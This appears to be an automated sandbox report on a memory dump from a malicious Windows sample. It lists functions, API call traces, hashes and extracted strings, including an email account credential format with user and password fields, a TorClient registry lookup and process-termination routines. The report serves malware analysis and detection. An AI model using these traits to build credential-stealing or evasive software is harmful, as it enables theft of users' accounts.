CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,02B82EC9,?), ref: 02B865B3
HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,02B82EC9,?,00000000,?,00000000,?,?), ref: 02B86626

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
String ID:
API String ID: 2078930461-0
Opcode ID: 6a7c937f54d9ca6c36e31f07b44f99b7f747eaad18b178214112160976956647
Instruction ID: f3ba1c197f5581ee4f9be9a5797e70337cfd5ca99a7cc0ddad5353b703fce79a
Opcode Fuzzy Hash: 6a7c937f54d9ca6c36e31f07b44f99b7f747eaad18b178214112160976956647
Instruction Fuzzy Hash: 0411E3315C1255BFD3313A61AC4DFAF3F5DEB467E0F000A10F609A61D1E7624864CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B8A378, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02B71791: lstrlen.KERNEL32(00000000), ref: 02B717F8
Part of subcall function 02B71791: sprintf.NTDLL ref: 02B71819

lstrlen.KERNEL32(00000000,00000000,76D681D0,00000000,?,?,02B94BA0,00000000,05AE8D60), ref: 02B8A3A3
lstrlen.KERNEL32(?,?,?,02B94BA0,00000000,05AE8D60), ref: 02B8A3AB

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

strcpy.NTDLL ref: 02B8A3C2
lstrcat.KERNEL32(00000000,?), ref: 02B8A3CD

Part of subcall function 02B81250: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,02B8A3DC,00000000,?,?,?,02B94BA0,00000000,05AE8D60), ref: 02B81267

Part of subcall function 02B84FB0: HeapFree.KERNEL32(00000000,00000200,02B86EB2,00000000,00000100,00000200), ref: 02B84FBC

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02B94BA0,00000000,05AE8D60), ref: 02B8A3EA

Part of subcall function 02B8530B: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,02B8A3F6,00000000,?,?,02B94BA0,00000000,05AE8D60), ref: 02B85315
Part of subcall function 02B8530B: _snprintf.NTDLL ref: 02B85373

Strings

=, xrefs: 02B8A3E4

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 16aa184548737cd875a8be862e9d6be5ed7bce35eafd37f45694d17db7e29d17
Instruction ID: db01655ba2c232b175adbc52b5bd17b9394413ae0a127fba20067e9b850bfed9
Opcode Fuzzy Hash: 16aa184548737cd875a8be862e9d6be5ed7bce35eafd37f45694d17db7e29d17
Instruction Fuzzy Hash: 5B11CA339015257B8B117B749C84C6F76AEDF467683094596FA0DA7200DF74D902DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B76229, Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 02B7625A
wcstombs.NTDLL ref: 02B7626B

Part of subcall function 02B780B6: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,02B76281,00000000), ref: 02B780C8
Part of subcall function 02B780B6: StrChrA.SHLWAPI(?,00000020,?,?,00000000,02B76281,00000000), ref: 02B780D7

OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 02B7628C
TerminateProcess.KERNEL32(00000000,00000000), ref: 02B7629B
CloseHandle.KERNEL32(00000000), ref: 02B762A2
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02B762B1
WaitForSingleObject.KERNEL32(00000000), ref: 02B762C1

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
String ID:
API String ID: 417118235-0
Opcode ID: 205118a9b6a282c7d218b6d7215cfea90569924d348e09e495133a60060c139c
Instruction ID: 3bd69ddcb0ec108bc7c2c890fac86c4b72e0851f891ef954398b56c0e8ee7a44
Opcode Fuzzy Hash: 205118a9b6a282c7d218b6d7215cfea90569924d348e09e495133a60060c139c
Instruction Fuzzy Hash: E0110131980A11FFEB505B65DE49BAA7BADFF11385F100154F948A3190C7B1EC60CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B81E61, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(02B745A1,00000000,00000000,00000000,?,?,02B911A1,02B745A1,00000000), ref: 02B81E7C
lstrlen.KERNEL32( | "%s" | %u,?,?,02B911A1,02B745A1,00000000), ref: 02B81E87
RtlAllocateHeap.NTDLL(00000000,00000029), ref: 02B81E98

Part of subcall function 02B7AB88: GetLocalTime.KERNEL32(?,?,?,?,02B8201B,00000000,00000001), ref: 02B7AB92
Part of subcall function 02B7AB88: wsprintfA.USER32 ref: 02B7ABC5

wsprintfA.USER32 ref: 02B81EBB

Part of subcall function 02B79A6E: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,02B81EE3,00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 02B79A8C
Part of subcall function 02B79A6E: wsprintfA.USER32 ref: 02B79AAA

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 02B81EEC

Strings

| "%s" | %u, xrefs: 02B81E7E, 02B81E83, 02B81EB6

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
String ID: | "%s" | %u
API String ID: 3847261958-3278422759
Opcode ID: d505614fe3a4ba749271d72796c27901afa980c4446f34361ef1b524832bec19
Instruction ID: 96e8c8da5e4ba71a98e5a45cd41a660191d1456ecb4322d3104d38fef7a53f29
Opcode Fuzzy Hash: d505614fe3a4ba749271d72796c27901afa980c4446f34361ef1b524832bec19
Instruction Fuzzy Hash: 7F11C631940109FFDB10AB69DD44E6F7B7DEF45399B100561F808D3110D6718D21CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B83BE4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringtimeCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(00000000,Main), ref: 02B83C05
RtlEnterCriticalSection.NTDLL(02B9E268), ref: 02B83C17
RtlLeaveCriticalSection.NTDLL(02B9E268), ref: 02B83C2A
lstrcmpi.KERNEL32(02B9E280,00000000), ref: 02B83C4B
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,02B76BE5,00000000), ref: 02B83C5F

Strings

Main, xrefs: 02B83BFD

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
String ID: Main
API String ID: 1266740956-521822810
Opcode ID: 98a97147cff22956f4649b93f92cfe40fb08c8885b6cbcef875bb3c5871f2f28
Instruction ID: 7a59da5d0d0501be266c366d06b70ec1c57a78326279f16e2e3aff99f560ddce
Opcode Fuzzy Hash: 98a97147cff22956f4649b93f92cfe40fb08c8885b6cbcef875bb3c5871f2f28
Instruction Fuzzy Hash: 3F11BF31940318EFDB14DF29C949A9ABBE8FF05768F0086AAE94993240C734DA50CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B8C747, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02B88800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88812
Part of subcall function 02B88800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B8882B
Part of subcall function 02B88800: GetCurrentThreadId.KERNEL32 ref: 02B88838
Part of subcall function 02B88800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88844
Part of subcall function 02B88800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88852
Part of subcall function 02B88800: lstrcpy.KERNEL32(00000000), ref: 02B88874

lstrcpy.KERNEL32(-000000FC,00000000), ref: 02B8C781
CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,02B7EF96,?,?,?), ref: 02B8C793
GetTickCount.KERNEL32 ref: 02B8C79E
GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,02B7EF96,?,?,?), ref: 02B8C7AA
lstrcpy.KERNEL32(00000000), ref: 02B8C7C4

Strings

\Low, xrefs: 02B8C773

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
String ID: \Low
API String ID: 1629304206-4112222293
Opcode ID: 3b6a42df9de86c15d430fa9b639b4a1922af0476675e5666d8830f746868bd72
Instruction ID: 4821bb6146f42230905c8d543d02b16d4770ea08dc217a8433dab0f26ffb3ae7
Opcode Fuzzy Hash: 3b6a42df9de86c15d430fa9b639b4a1922af0476675e5666d8830f746868bd72
Instruction Fuzzy Hash: 560147B1A815257BD2117B79AD48F6F7BDCEF07692F0109A6F608D3180CB28E911C7B8

Uniqueness

Uniqueness Score: -1.00%

Function 02B8A67C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 02B8A693

Part of subcall function 02B83587: wcstombs.NTDLL ref: 02B83645

lstrlen.KERNEL32(?,?,?,?,?,02B908C4,?,?), ref: 02B8A6B6
lstrlen.KERNEL32(?,?,?,?,02B908C4,?,?), ref: 02B8A6C0
memcpy.NTDLL(?,?,00004000,?,?,02B908C4,?,?), ref: 02B8A6D1
HeapFree.KERNEL32(00000000,?,?,?,?,02B908C4,?,?), ref: 02B8A6F3

Strings

Access-Control-Allow-Origin:, xrefs: 02B8A681

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heaplstrlen$AllocateFreememcpywcstombs
String ID: Access-Control-Allow-Origin:
API String ID: 1256246205-3194369251
Opcode ID: 2449bca3f6078c761caeac8c00ccd6dbaeb4b9c77b06565dda0f9e4ecaf17b40
Instruction ID: 4abf0cec1a3ae32935df0e701316ed3bb2aa8fcef7941d7e4d083f409a557ca6
Opcode Fuzzy Hash: 2449bca3f6078c761caeac8c00ccd6dbaeb4b9c77b06565dda0f9e4ecaf17b40
Instruction Fuzzy Hash: 6811AD76940204EFCB10AF55DC45F5EBBB9FB853A0F2044A9E909E3350D7319D20DB24

Uniqueness

Uniqueness Score: -1.00%

Function 02B81B2B, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 02B9134B: lstrlen.KERNEL32(?,00000008,00000000,?,76D25520,02B81372,?,?,00000000,02B71589,?,00000000,?,02B85B4A,?,00000001), ref: 02B9135A
Part of subcall function 02B9134B: mbstowcs.NTDLL ref: 02B91376

lstrlenW.KERNEL32(00000000,00000000,00000094,%APPDATA%\Microsoft\,00000000,?,?,02B7A164,?), ref: 02B81B50
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B81B62
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,02B7A164,?), ref: 02B81B7F
lstrlenW.KERNEL32(00000000,?,?,02B7A164,?), ref: 02B81B8B
HeapFree.KERNEL32(00000000,00000000,?,?,02B7A164,?), ref: 02B81B9F

Strings

%APPDATA%\Microsoft\, xrefs: 02B81B30

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
String ID: %APPDATA%\Microsoft\
API String ID: 3403466626-2699254172
Opcode ID: 1e40b99baeff7b6c5c7ec2b6e635e9ed4e8ee0e47eab137fdf7dc44701c4cc0d
Instruction ID: c82d68d945084147ac9d73640d046ba57ce9d751095a307ef646d7104fd93b4a
Opcode Fuzzy Hash: 1e40b99baeff7b6c5c7ec2b6e635e9ed4e8ee0e47eab137fdf7dc44701c4cc0d
Instruction Fuzzy Hash: C501BC32941215BFE711AF99ED45FAA37ACEF06394F100461F505E7150DBB09D21CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B81647, Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 208stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(142A03F6), ref: 02B8175E
lstrlen.KERNEL32(142903F0), ref: 02B8176C

Part of subcall function 02B850B0: lstrlen.KERNEL32(?,00000104,?,00000000,02B81744,142D03E9,?), ref: 02B850BB
Part of subcall function 02B850B0: lstrcpy.KERNEL32(00000000,?), ref: 02B850D7

Strings

POP3, xrefs: 02B81802
SMTP, xrefs: 02B817F4
type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S, xrefs: 02B8181C
IMAP, xrefs: 02B81809, 02B8181B

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$lstrcpy
String ID: IMAP$POP3$SMTP$type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S
API String ID: 805584807-1010173016
Opcode ID: aaac0129fd6bde41aa2d0723e4658354b8c5687d61d6b9b5818f3276d6c1aae8
Instruction ID: de094bf39881b7be7009eb2f537083aaea31c3622c4cc0736e890dead0f2a1a4
Opcode Fuzzy Hash: aaac0129fd6bde41aa2d0723e4658354b8c5687d61d6b9b5818f3276d6c1aae8
Instruction Fuzzy Hash: E1711B75911119AFCF25EFA9C884AEEBBB9EF08704F1541ADE90DA3110D730DA51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02B8C50E, Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

GetLastError.KERNEL32(?,?,?,00001000,?,02B9E130,76D7F750), ref: 02B8C58F
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,02B9E130,76D7F750), ref: 02B8C614
CloseHandle.KERNEL32(00000000,?,02B9E130,76D7F750), ref: 02B8C62E
OpenProcess.KERNEL32(00100000,00000000,00000000,?,?,?,02B9E130,76D7F750), ref: 02B8C663

Part of subcall function 02B8408E: RtlReAllocateHeap.NTDLL(00000000,?,?,02B8804C), ref: 02B8409E

WaitForSingleObject.KERNEL32(?,00000064,?,02B9E130,76D7F750), ref: 02B8C6E5
CloseHandle.KERNEL32(F0FFC983,?,02B9E130,76D7F750), ref: 02B8C70C

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
String ID:
API String ID: 3115907006-0
Opcode ID: ace5a3de0e402154ba430a02f0461bb8a0875b93178a357ad2d2bf561edceb61
Instruction ID: 8c27a6e86dc34fd660199e781efde681b6f9a6b370b8ea77121bf21f0575259d
Opcode Fuzzy Hash: ace5a3de0e402154ba430a02f0461bb8a0875b93178a357ad2d2bf561edceb61
Instruction Fuzzy Hash: 028109B1D00219EFDF15EFA4C984AADBBB5FF08344F1444AAE919AB251D731E950CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B7991D, Relevance: 9.1, APIs: 6, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57681cdd8e8a4f2cafadaa9905a348e00522f47e295f451c1614dc42571ce6d0
Instruction ID: 78430990077859f913cf9baa8b6683ce7006e4488c10d6c44304fb4a55b5ac62
Opcode Fuzzy Hash: 57681cdd8e8a4f2cafadaa9905a348e00522f47e295f451c1614dc42571ce6d0
Instruction Fuzzy Hash: 6341CFB1600B05AFD720AF298C85A2BB7B9FB85364F504A7DF6BAC3180D7709854CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02B90A16, Relevance: 9.1, APIs: 6, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

memset.NTDLL ref: 02B90A61
RtlEnterCriticalSection.NTDLL(00000008), ref: 02B90AD9
RtlLeaveCriticalSection.NTDLL(?), ref: 02B90AF1
GetLastError.KERNEL32(02B8209D,?,?), ref: 02B90B09
RtlEnterCriticalSection.NTDLL(?), ref: 02B90B15
RtlLeaveCriticalSection.NTDLL(?), ref: 02B90B24

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocateErrorHeapLastmemset
String ID:
API String ID: 2000578454-0
Opcode ID: eb109a5bed2be12a2f9022aa6a275f6dc71e7f28d03fc5d73d9f3fe06cac8d76
Instruction ID: 3fd455eea6b19d066bc690e6549894421b2b6d71ceacfe69c26a7c8cb8cee0bb
Opcode Fuzzy Hash: eb109a5bed2be12a2f9022aa6a275f6dc71e7f28d03fc5d73d9f3fe06cac8d76
Instruction Fuzzy Hash: 134172B1901705EFDB20EF65C844BAEBBF8FF08794F108569E559D7280E3749654CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02B73828, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON

Download Yara Rule

APIs

OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 02B73842
CreateWaitableTimerA.KERNEL32(02B9E0D4,00000003,?), ref: 02B7385F
GetLastError.KERNEL32(?,?,02B83A3F,?,?,?,00000000,?,?,?), ref: 02B73870

Part of subcall function 02B8672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,02B71CDF,00000000,00000000,?,?,00000000,?,?,?,02B71CDF,TorClient), ref: 02B86765
Part of subcall function 02B8672D: RtlAllocateHeap.NTDLL(00000000,02B71CDF), ref: 02B86779
Part of subcall function 02B8672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,02B71CDF,?,?,?,02B71CDF,TorClient,?,?), ref: 02B86793
Part of subcall function 02B8672D: RegCloseKey.KERNELBASE(?,?,?,?,02B71CDF,TorClient,?,?), ref: 02B867BD

GetSystemTimeAsFileTime.KERNEL32(?,00000000,02B83A3F,?,?,?,02B83A3F,?), ref: 02B738B0
SetWaitableTimer.KERNEL32(00000000,02B83A3F,00000000,00000000,00000000,00000000,?,?,02B83A3F,?), ref: 02B738CF
HeapFree.KERNEL32(00000000,02B83A3F,00000000,02B83A3F,?,?,?,02B83A3F,?), ref: 02B738E5

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
String ID:
API String ID: 1835239314-0
Opcode ID: 5a780c645f2e17e75f185606b8dd535590d365a7932a760b50a0d5c4e06c2833
Instruction ID: 1a076b81e15b9895e605543fa13be98d594358f9a28efb09f2d6337d9f0ba121
Opcode Fuzzy Hash: 5a780c645f2e17e75f185606b8dd535590d365a7932a760b50a0d5c4e06c2833
Instruction Fuzzy Hash: 38312B71D00209FBCF20DF95C989DAEBBB9EB85355B104495F916E7100D730AA50EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B845CA, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,02B71440,?,?,?,?,02B87689,?,?,00000000,?,00000B54), ref: 02B845EF
GetProcAddress.KERNEL32(00000000,7243775A), ref: 02B84611
GetProcAddress.KERNEL32(00000000,614D775A), ref: 02B84627
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02B8463D
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02B84653
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02B84669

Part of subcall function 02B7E010: memset.NTDLL ref: 02B7E091

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: dffd693af43803ab7f0025129ab45ce67041023774ef6ac2bee3cb6399bd5695
Instruction ID: 2efdfd2c895a4c3d6a86291b92b8356e35e8b5aad83543184ee08b0a3e0a0c0b
Opcode Fuzzy Hash: dffd693af43803ab7f0025129ab45ce67041023774ef6ac2bee3cb6399bd5695
Instruction Fuzzy Hash: C92110B190020AEFD710EF69DD45E5A7BFCEB04394B0649A6E90DD7211E771EA09CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B8BAE9, Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?), ref: 02B8BB28
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02B8BB39
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000,?,?,?,?), ref: 02B8BB54
GetLastError.KERNEL32(?,?,?,?), ref: 02B8BB6A
HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 02B8BB7C
HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 02B8BB91

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
String ID:
API String ID: 1822509305-0
Opcode ID: 65ca5f7ac8da0e89c84a7feeee06c4adfbf12022340fddb2d5ba1fa0690d9ec9
Instruction ID: 491c314756d4bd8e2368162a852cc0de69b4d9b84508bc5e99e0f7091b614c68
Opcode Fuzzy Hash: 65ca5f7ac8da0e89c84a7feeee06c4adfbf12022340fddb2d5ba1fa0690d9ec9
Instruction Fuzzy Hash: A6112C76941028FBCF216AA6DD08DEF7F7EEF4A3E4B004561F509E2160C7314A61DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B8B291, Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000E39,00000000,?), ref: 02B8B2B9
_strupr.NTDLL ref: 02B8B2F4
lstrlen.KERNEL32(00000000), ref: 02B8B2FC
TerminateProcess.KERNEL32(00000000,00000000), ref: 02B8B33C
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 02B8B343
GetLastError.KERNEL32 ref: 02B8B34B

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
String ID:
API String ID: 110452925-0
Opcode ID: 2a9ac3719aa20f749adfd41d406d012f740b962e178d7c9cb4ec4bdb5d1fd2eb
Instruction ID: 7534218edb15ba0e9998d5092f3ce31307236326daa0456b6973910d8b1325b1
Opcode Fuzzy Hash: 2a9ac3719aa20f749adfd41d406d012f740b962e178d7c9cb4ec4bdb5d1fd2eb
Instruction Fuzzy Hash: 3811A372940105FFDB117B70DE88EAE377DEB89799B048856FA0AE3150DB74D854CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B79E9F, Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,00000000,00000000,?,?,02B748BE,02B91A07,00000057,00000000,?,?,?,02B76516,00000000,Scr), ref: 02B79EB5
RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 02B79EC8
lstrcpy.KERNEL32(00000008,?), ref: 02B79EEA
GetLastError.KERNEL32(02B8328C,00000000,00000000,?,?,02B748BE,02B91A07,00000057,00000000,?,?,?,02B76516,00000000,Scr,?), ref: 02B79F13
HeapFree.KERNEL32(00000000,00000000,?,?,02B748BE,02B91A07,00000057,00000000,?,?,?,02B76516,00000000,Scr,?,?), ref: 02B79F2B
CloseHandle.KERNEL32(00000000,02B8328C,00000000,00000000,?,?,02B748BE,02B91A07,00000057,00000000,?,?,?,02B76516,00000000,Scr), ref: 02B79F34

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2860611006-0
Opcode ID: 77425cb7cd767379e6dbf900955da429c17e5b9ee63d6e46e6f64a258fffbe0c
Instruction ID: fbd58fcc5a42cc309055a95f31a346bf6039ce0a0fb3cf880f9e816b0ef4ebaa
Opcode Fuzzy Hash: 77425cb7cd767379e6dbf900955da429c17e5b9ee63d6e46e6f64a258fffbe0c
Instruction Fuzzy Hash: F1119471940605EFDB109F65DD889AFBBB8FB063A4700496AF86AC3250DB709D65CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B795DC, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

LoadLibraryA.KERNEL32(6676736D,00000000,00000001,00000014,00000020,02B94804,00000000,00000001), ref: 02B795FC
GetProcAddress.KERNEL32(00000000,704F4349), ref: 02B7961B
GetProcAddress.KERNEL32(00000000,6C434349), ref: 02B79630
GetProcAddress.KERNEL32(00000000,6E494349), ref: 02B79646
GetProcAddress.KERNEL32(00000000,65474349), ref: 02B7965C
GetProcAddress.KERNEL32(00000000,65534349), ref: 02B79672

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AddressProc$AllocateHeapLibraryLoad
String ID:
API String ID: 2486251641-0
Opcode ID: 70a43d8982f836aa3eb41c1e80a082b079da51c80b655859790cece4543f54ad
Instruction ID: 39e259770648a1e8274af475ad4dcf0f5c7b93c60a7b034fa9ff307c8a12119d
Opcode Fuzzy Hash: 70a43d8982f836aa3eb41c1e80a082b079da51c80b655859790cece4543f54ad
Instruction Fuzzy Hash: FE1194B2600A06AFE710EB78DD81E5733ECEB043883070966ED5AD7124E731F9098B70

Uniqueness

Uniqueness Score: -1.00%

Function 02B88800, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88812

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B8882B
GetCurrentThreadId.KERNEL32 ref: 02B88838
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88844
GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88852
lstrcpy.KERNEL32(00000000), ref: 02B88874

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
String ID:
API String ID: 1175089793-0
Opcode ID: 926cd764398630a50f757e24dea380aa9634f60776ee2683f4d146073442e388
Instruction ID: bc9073c87099f6e0593dbc39cc6982ac45efd07dbb1474a55f321e653d511e6e
Opcode Fuzzy Hash: 926cd764398630a50f757e24dea380aa9634f60776ee2683f4d146073442e388
Instruction Fuzzy Hash: BF019673D40119BBD7117BA69D88D6B7BBCDF86B847090565FA09D3201DB70E810CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 02B89299, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B892F4
SetLastError.KERNEL32(00000000,?,?,?), ref: 02B89348

Strings

vids, xrefs: 02B89353

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastmemset
String ID: vids
